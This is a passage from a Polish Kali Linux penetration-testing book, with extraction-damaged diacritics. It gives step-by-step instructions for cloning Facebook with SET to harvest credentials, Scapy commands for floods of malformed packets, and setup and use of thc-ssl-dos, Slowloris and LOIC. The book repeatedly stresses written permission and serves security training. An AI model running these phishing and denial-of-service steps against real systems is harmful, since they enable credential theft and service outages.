Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
